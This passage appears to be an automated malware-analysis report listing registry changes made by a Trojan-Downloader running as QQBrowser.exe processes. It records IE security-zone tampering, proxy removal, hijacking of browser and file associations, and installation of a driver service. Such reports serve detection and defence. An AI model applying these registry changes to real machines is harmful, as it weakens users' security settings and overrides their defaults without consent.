[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"minidownload.exe" = "软件助手安装包"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 C8 DB FF 01 2B 73 E0 84 C0 C0 47 6D 2E 7D 29"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SogouSoftware]
"SogouSoftware.exe" = "软件助手"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process QQBrowser.exe:1268 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 A3 41 FA F1 90 83 C8 E7 5A D9 29 47 2D DB 74"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Tencent\TodayDo]
"QBRepairPath" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\ghgfpcpdfhmoghgepjalhnielnlemggj\9.0.0.31_0\BrowserProtect18.exe"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Tencent\TodayDo]
"FixQb" = "2016051910"
The process QQBrowser.exe:2328 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 9B 9A BA A5 1D FB 6A 8F C2 51 FA 4A 2D 16 59"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process QQBrowser.exe:2612 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 79 82 46 12 C5 D6 31 D4 75 61 52 77 2A 09 79"
The process QQBrowser.exe:3756 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 31 32 8C 58 7D 9A 34 EE 99 57 AB CF 0A 85 53"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process QQBrowser.exe:3532 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 F7 B0 A2 E2 F6 82 D7 82 E0 A3 4A A1 17 17 23"
The process QQBrowser.exe:2196 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKCR\QQBrowser.Protocol]
"(Default)" = "QQBrowser Protocol"
[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe"
[HKCR\Tencent.QQBrowser.Default\.exe\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe %*"
[HKCR\QQBrowser.File\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"
[HKCR\QQBrowser.Protocol\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\QQBrowser.File\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"
[HKCR\Tencent.QQBrowser.Default\.exe\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".xhtml" = "QQBrowser.File"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations]
"http" = "QQBrowser.Protocol"
[HKLM\SOFTWARE\RegisteredApplications]
"QQBrowser" = "Software\Tencent\QQBrowser\Capabilities"
[HKCU\Software\Tencent\QQBrowser\Scopes\2196_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".xht" = "QQBrowser.File"
[HKCR\QQBrowser.Protocol\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Tencent\QQBrowser\CurrentVersion\App Paths\QQBrowser.exe]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe"
[HKCR\QQBrowser.Protocol\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"
[HKCR\QQBrowser.File]
"URL Protocol" = ""
[HKCR\QQBrowser.File\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".mht" = "QQBrowser.File"
".mhtml" = "QQBrowser.File"
[HKCR\Tencent.QQBrowser.Default\.exe\shell\run\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe %*"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".shtml" = "QQBrowser.File"
[HKCR\QQBrowser.File]
"AppUserModelID" = "Tencent.QQBrowser.Default"
[HKCR\QQBrowser.Protocol]
"URL Protocol" = ""
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".htm" = "QQBrowser.File"
[HKCR\QQBrowser.Protocol]
"AppUserModelID" = "Tencent.QQBrowser.Default"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".html" = "QQBrowser.File"
[HKCR\QQBrowser.File]
"(Default)" = "QQBrowser HTML Document"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 16 C4 7D B6 D7 B2 B9 52 0D 3B C7 5E 68 4C CA"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations]
"https" = "QQBrowser.Protocol"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QQBrowser.exe]
"Path" = "%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities]
"ApplicationName" = "QQBrowser"
[HKCU\Software\Tencent\QQBrowser\http\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe -nohome"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations]
"ftp" = "QQBrowser.Protocol"
[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities]
"ApplicationDescription" = "QQBrowser"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCR\Tencent.QQBrowser.Default\.exe\shell\open\command]
"DelegateExecute"
[HKCR\Tencent.QQBrowser.Default\.exe\shell\run\command]
"DelegateExecute"
The process QQBrowser.exe:3736 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 8B CE 25 4F 76 77 19 AB 58 AA 87 CF 29 2C 32"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
The process QQBrowser.exe:2944 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 F0 7F 7C 82 DB C0 01 18 0A AD BF B5 17 CE 68"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"
The process QQBrowser.exe:3652 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 0A 20 11 21 B8 EE 91 72 FD B4 F6 56 82 97 86"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
The process QQBrowser.exe:3128 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 0E 93 12 91 FB 0E 3D 3D 72 FA 12 25 89 16 2B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\QB]
"TsService.exe" = "TsService"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Tencent\QQBrowser]
"S3"
"S4"
The process QQBrowser.exe:1968 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 DE 38 4F A4 BD A8 8A 13 37 A6 F7 E6 94 7D 1A"
The process QQBrowser.exe:3472 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 19 5C EA A0 C3 18 19 B8 9C 20 AC 55 CA F9 D5"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Tencent\QQBrowser\Launch]
"Relauch"
The process QQBrowser.exe:3028 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\https\UserChoice]
"Progid" = "QQBrowser.Protocol"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html\PersistentHandler]
"(Default)" = "{eec97550-47a9-11cf-b952-00aa0051fe20}"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xht\UserChoice]
"Hash" = "3zpRgqkXzls="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html]
"PerceivedType" = "text"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\shtml]
"(Default)" = "QQBrowser.File"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm\UserChoice]
"Hash" = "MRqnJxyt1mo="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\ftp]
"Hash" = "NhraD0/5Dwo="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\http\UserChoice]
"Hash" = "2Wt0kbHDnFk="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html\UserChoice]
"Progid" = "QQBrowser.File"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\https\UserChoice]
"Hash" = "xsLOy1tlz4o="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mhtml]
"(Default)" = "mhtmlfile"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xht]
"(Default)" = "QQBrowser.File"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mhtml]
"Content Type" = "message/rfc822"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mht]
"(Default)" = "mhtmlfile"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\ftp\UserChoice]
"Progid" = "QQBrowser.Protocol"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mht\UserChoice]
"Progid" = "QQBrowser.File"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\ftp]
"Progid" = "QQBrowser.Protocol"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm]
"(Default)" = "htmlfile"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm\PersistentHandler]
"(Default)" = "{eec97550-47a9-11cf-b952-00aa0051fe20}"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xhtml\UserChoice]
"Hash" = "neEWU 3HcOo="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\shtml\UserChoice]
"Progid" = "QQBrowser.File"
[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"SID" = "S-1-5-21-1844237615-1960408961-1801674531-1003"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\http]
"Progid" = "QQBrowser.Protocol"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"DrvInstalled" = "1"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\shtml]
"PerceivedType" = "text"
[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"QBInstallPath" = "%Documents and Settings%\%current user%\Application Data\QB"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mht]
"Content Type" = "message/rfc822"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xht\UserChoice]
"Progid" = "QQBrowser.File"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html]
"Content Type" = "text/html"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\shtml\UserChoice]
"Hash" = "evcNM68HiKk="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\http\UserChoice]
"Progid" = "QQBrowser.Protocol"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mhtml\UserChoice]
"Progid" = "QQBrowser.File"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html\UserChoice]
"Hash" = "pvfU5pRLIDU="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\ftp\UserChoice]
"Hash" = "NhraD0/5Dwo="
[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"BSOD" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 AF 3E 3F 6C C0 B3 70 A6 A3 74 0C 26 07 99 7B"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm\UserChoice]
"Progid" = "QQBrowser.File"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html]
"(Default)" = "htmlfile"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xhtml]
"(Default)" = "QQBrowser.File"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm]
"Content Type" = "text/html"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xhtml\UserChoice]
"Progid" = "QQBrowser.File"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\shell]
"(Default)" = "open"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\https]
"Progid" = "QQBrowser.Protocol"
[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"ImagePath" = "\??\%System%\drivers\TsQBDrv.sys"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\http]
"Hash" = "2Wt0kbHDnFk="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mhtml\UserChoice]
"Hash" = "RVdenEVwbas="
[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"QBPath" = "\DosDevices\%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\https]
"Hash" = "xsLOy1tlz4o="
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm]
"PerceivedType" = "text"
[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mht\UserChoice]
"Hash" = "dctCQK95cmM="
The process QQBrowser.exe:2888 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 2C 14 88 B7 AD 06 A7 3B 5F 13 9D 55 51 2D C9"
The process QQBrowser.exe:3576 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E 8D 22 B3 F3 E5 53 EF 78 98 EB FE 2D 33 99 B7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
The process QQBrowser.exe:1960 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 52 34 64 7C 28 BC 48 F4 76 9B F1 09 15 6E F0"
The process QQBrowser.exe:1252 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"BitNames" = " WLANHC_AUTOCONFIG WLANHC_RNWFMSM WLANHC_FATMSM WLANHC_DLLMAIN WLANHC_TEST"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"BitNames" = " DOT11_AUTOCONF DOT11_AUTOCONF_CLIENT DOT11_AUTOCONF_UI DOT11_FATMSM DOT11_COMMON DOT11_WLANGPA DOT11_CLASS_COINSTALLER"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"Guid" = "2e8d9ec5-a712-48c4-8ce0-631eb0c1cd65"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Chromium\StabilityMetrics]
"user_experience_metrics.stability.exited_cleanly" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"BitNames" = " DOT11_ASSOCIATE DOT11_ROAMING DOT11_1X DOT11_PNP DOT11_SCAN DOT11_RECEIVE DOT11_SEND DOT11_IOCTL DOT11_OID DOT11_MISC DOT11_UPCALL DOT11_KEYMGR DOT11_PEER DOT11_SOFTAP DOT11_PAM DOT11_REPEATER DOT11_APROUTER DOT11_WME DOT11_CONFIG DOT11_MSM DOT11_MSM_ADAPT DOT11_MSM_SCAN DOT11_MSM_CONNECT DOT11_MSM_SECURITY_PKT DOT11_NOTIFY_OBJECT"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"Guid" = "0c5a3172-2248-44fd-b9a6-8389cb1dc56a"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
